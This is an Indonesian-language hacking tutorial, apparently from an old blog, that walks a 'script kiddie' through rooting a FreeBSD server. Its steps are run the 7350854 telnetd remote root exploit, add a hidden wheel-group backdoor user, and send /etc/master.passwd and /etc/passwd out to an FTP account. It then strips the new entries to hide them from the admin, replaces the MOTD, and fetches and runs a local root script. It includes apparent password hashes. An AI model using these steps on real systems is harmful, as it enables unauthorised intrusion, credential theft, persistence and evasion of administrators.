Viva buat script kiddies, karena saya bukan hacker :P~, melainkan lamerz, pertama-tama jelas anda harus punya shell buat anda jadikan modal ngeroot server FreeBSD tersebut, terserah anda akan menggunakan exploits apa, yang jelas anda pasti lebih mengerti dari pada saya, saya kasih contoh pake remote exploit menggunakan telnetd 7350854.c
Ex :
[lee@linux .lee]$ ./bsd target.com
7350854 - x86/bsd telnetd remote root
by zip, lorian, smiler and scut.
check: PASSED, using 16mb mode
######################################
ok baby, times are rough, we send 16mb traffic to the remote telnet daemon process, it will spill badly. but then,
there is no other way, sorry...
## setting populators to populate heap address space
## number of setenvs (dots / network): 31500
## number of walks (percentage / cpu): 496140750
##
## the percentage is more realistic than the dots ;)
percent |-----------------------------------| ETA |
19.19% |......................... | 00:49:32 |
oke kita tunggu sampe dapet root
## sleeping for 10 seconds to let the process recover
## ok, you should now have a root shell
## as always, after hard times, there is a reward...
command: ÿý%id;uname -a;whoami
uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 31(guest)
FreeBSD target.com 4.2-RELEASE FreeBSD 4.2-RELEASE #1: Sat Nov 25 10:13:58 CST 2000 root@target.com:/usr/src/sys/compile/MAIL i386
root
!LOL anda bisa tertawa girang anda sudah mendapatkan Root, sekarang anda siapkan jurus buat mengamankan shell FreeBSD baru anda ini, dan anda add user dulu.
/usr/sbin/pw adduser gue -g wheel -s /bin/tcsh -d /etc/.gue
Terus bikin home buat anda di shell nya
mkdir /etc/.gue
terus sekolahin tuh shell biar bisa baca tulis
/usr/sbin/chown gue.wheel -R /etc/.gue
chown: -R: No such file or directory
Wekz.!!! kok no such file , cuekin aja namanya juga lamerz sekarang kita bikin pass nya dulu
passwd gue
New password:gue1234
Retype new password:gue1234
passwd: updating the database...
passwd: done
Changing local password for gue.
okbaybeh !! sekarang anda telnet ke shell freebsd baru anda itu
FreeBSD/i386 (target.com) (ttyp3)
login: gue
Password:*****
Copyright (c) 1980, 1983, 1986, 1988, 1990, 1991, 1993, 1994
The Regents of the University of California. All rights reserved.
FreeBSD 4.2-RELEASE (MAIL) #1: Sat Nov 25 10:13:58 CST 2000
Welcome to FreeBSD!
Before seeking technical support, please use the following resources:
o Security advisories and updated errata information for all releases are at http://www.FreeBSD.org/releases/ - always consult the ERRATA section for your release first as it's updated frequently.
o The Handbook and FAQ documents are at http://www.freebsd.org/ and, along with the mailing lists, can be searched by going to http://www.FreeBSD.org/search.html. If the doc distribution has been installed, they're also available formatted in /usr/share/doc.
If you still have a question or problem, please take the output of `uname -a', along with any relevant error messages, and email it as a question to the questions@FreeBSD.org mailing list. If you are unfamiliar with FreeBSD's directory layout, please refer to the hier(7) man page. If you are not familiar with man pages, type "man man".
You may also use `/stand/sysinstall' to re-enter the installation and configuration utility. Edit /etc/motd to change this login announcement.
>
nahh sekarang kita racik bumbunya, kita balik ke root tadi, kita liat file master.passwd sama passwd,
cat /etc/master.passwd
s163:pUUA5f8KSAvAo:1565:1040::0:0:teacher part-time 20020506:/home/professor/ACCT/s163:/usr/local/util/msman
mhw:whrd1YujBvuWI:1566: 1040::0: 0: teacher part-time: /home/professor/ACCT/ mhw:/usr/local/util/msman
gue:$1$MDoybd3Y$OBWMzMHYU8WJkRAU8hSP00: 6925:0::0:0: User &:/etc/.pupet:/bin/tcsh
ada entry baru di file tersebut, hemm admin bisa curiga neh, kita liat juga di file passwd
cat /etc/passwd
syscpa:*:1564:1040:teachers part-time 20020506:/home/professor/ACCT/syscpa:/usr/local/util/msman
s163:*:1565:1040:teacher part-time 20020506:/home/professor/ACCT/s163:/usr/local/util/msman
mhw:*:1566:1040:teacher part-time:/home/professor/ACCT/mhw:/usr/local/util/msman
gue:*:6925:0:User &:/etc/.pupet:/bin/tcsh
fiiiuuuhhh ada juga, okies santee, kita ke folder /etc
cd /etc
hemm jadi gimana donkz ?... ya udah kita buka ftp, ( pake ftp account anda dimanahlah terserah anda )
ftp
open uhamka-student.net
uhamka-student.net <-= masukin login
Password:***** <-= masukin password
udah gitu loe kirim file master.passwd sama file passwd ke ftp account loe
put master.passwd
abis itu file passwd
put passwd
setelah itu anda ambil / DL file master.passwd sama file passwd tadi dari ftp anda tadi, terus anda edit, setelah itu anda buka master.passwd menggunakan notepad.
s163:pUUA5f8KSAvAo:1565:1040::0:0:teacher part-time 20020506:/home/professor/ACCT/s163:/usr/local/util/msman
mhw:whrd1YujBvuWI:1566:1040::0:0:teacher part-time:/home/professor/ACCT/mhw:/usr/local/util/msman
gue:$1$MDoybd3Y$OBWMzMHYU8WJkRAU8hSP00:6925: 0::0:0: User &:/etc/.pupet:/bin/tcsh <=-- ini anda hapus
jadi tinggal :
s163:pUUA5f8KSAvAo:1565:1040::0:0:teacher part-time 20020506:/home/professor/ACCT/s163:/usr/local/util/msman
mhw:whrd1YujBvuWI:1566: 1040::0:0: teacher part-time:/home/professor/ACCT/mhw:/usr/local/util/msman
terus file tersebut anda save
setelah itu anda buka satu file lagi passwd, sama seperti tadi anda hapus "entry" yang baru aja anda buat pass add user
s163:*:1565:1040:teacher part-time 20020506:/home/professor/ACCT/s163:/usr/local/util/msman
mhw:*:1566:1040:teacher part-time:/home/professor/ACCT/mhw:/usr/local/util/msman
gue:*:6925:0:User &:/etc/.pupet:/bin/tcsh <-= loe hapus juga ini
jadi
s163:*:1565:1040:teacher part-time 20020506:/home/professor/ACCT/s163:/usr/local/util/msman
mhw:*:1566:1040:teacher part-time:/home/professor/ACCT/mhw:/usr/local/util/msman
setelah itu anda save
file master.passwd sama passwd di ftp account anda, anda hapus dan file master.passwd sama passwd yang sudah anda edit anda upload ke ftp account anda lagi, setelah itu anda hapus file asli yang anda root tadi
rm master.passwd
rm passwd
anda ganti sama file master.passwd dan passwd yang sudah anda edit dan sudah anda upload ke ftp account anda, terus anda kirim lagi master.passwd sama passwd hasil editan anda ke shell tadi
kita liat hasilnya
cat /etc/passwd
syscpa:*:1564:1040:teachers part-time 20020506:/home/professor/ACCT/syscpa:/usr/local/util/msman
s163:*:1565:1040:teacher part-time 20020506:/home/professor/ACCT/s163:/usr/local/util/msman
mhw:*:1566:1040:teacher part-time:/home/professor/ACCT/mhw:/usr/local/util/msman
upsss !! dah tidak ada, terus hilang dong account baru kita, hemmmz tidaklah kawan, coba anda telnet lagi pake user sama pass yang tadi anda buat, kita test
FreeBSD/i386 (target.com) (ttyp4)
login: gue
Password:
Copyright (c) 1980, 1983, 1986, 1988, 1990, 1991, 1993, 1994
The Regents of the University of California. All rights reserved.
PUPET and AxAL At #cracxer IRC.DAl.net Welcome Guys Sorry for the admin <-= file motd-nya saya ganti
Fiuuuh masih bisa masuk, khan sudah di hapus ?? <-= jangan tanya saya, be 'coz saya khan cuma lamers, hehehehe, trus anda puas dengan hasil anda ini ngak khan..??, anda pasti ingin mendapetkan akses root, gampang saja anda tinggal cari local exploit untuk mendapatkan akses root, oke sekarang kita ambil script nya, jangan lupa root box anda tutup saja,dan anda menggunakan account baru, terus anda ambil scriptnya yang sudah anda siapkan di ftp account anda
ftp> open uhamka-student.net
Connected to uhamka-student.net.
220 ProFTPD 1.2.4 Server (AEI Web Sites) [216.52.166.48]
Name (uhamka-student.net:pupet): uhamka-student.net
331 Password required for uhamka-student.net.
Password:******
230 User uhamka-student.net logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> get evelyne.sh
local: evelyne.sh remote: evelyne.sh
227 Entering Passive Mode (211,101,151,167,121,20)
150 Opening ASCII mode data connection for evelyne.sh (1023 bytes).
100% 1055 00:00 ETA
226 Transfer complete.
1055 bytes received in 1.00 seconds (1.03 KB/s)
ftp> bye
kalau sudah anda ambil scriptnya, anda racik deh, caranya:
mv evelyne.sh su
ganti chmod nya
chmod +x su
anda jalankan scriptnya
>./su
Please hit ctrl-c twice...
nah anda tekan CTRL + c ( 2 kali )
now login with user eric and password FLUE A COOK HOVE DOUR SKY
after you're logged in you can su to root with the same
password
Trying ::1...
Connected to localhost.
Escape character is '^]'.
FreeBSD/i386 (target.com) (ttyp4)
login:eric
pass :FLUE A COOK HOVE DOUR SKY
Copyright (c) 1980, 1983, 1986, 1988, 1990, 1991, 1993, 1994
The Regents of the University of California. All rights reserved.
PUPET and AxAL At #cracxer IRC.DAl.net Welcome Guys Sorry for the admin
>su
s/key 97 de09623
Password:FLUE A COOK HOVE DOUR SKY
#id
uid=0(root) gid=0(root) groups=0(root), 2(kmem), 3(sys), 4(tty), 5(operator), 31(guest)
>
Nah asik khan, sekali lagi hidup lamerz and script kiddies, thanks to all my friend at #cracxer Irc.dal.net , #cracxer will be back, thanks sekali lagi buat AXAl yang dah mau ngasih opini dan nemenin saya bikin artikel ini, juga buat petualang, kaka-joe, pak-tani, notts, babah, maffias yang Lagi bobo, ERNESTO_CHE_GUEVARRA (temen buat ke dugem) heueheu VIVA #CRACXER
Daftar exploit.
bisa anda dapatkan di www.packetstormsecurity.org, www.neworder.box.sk
Tutor ini saya rasa masih banyak "kekurangan" dan perlu pembenahan lebih dalam dari para Sang Ahli, karena sekali lagi saya cuma seorang lamerz dan sangat lamerz
-Sebelumnya Terima kasih atas kritik dan sarannya dan untuk "Jasakom.com" yang sudah mempublikasikan Artikel dari "si L@mers ini" viva jasako
Mengenai Saya
Pencarian
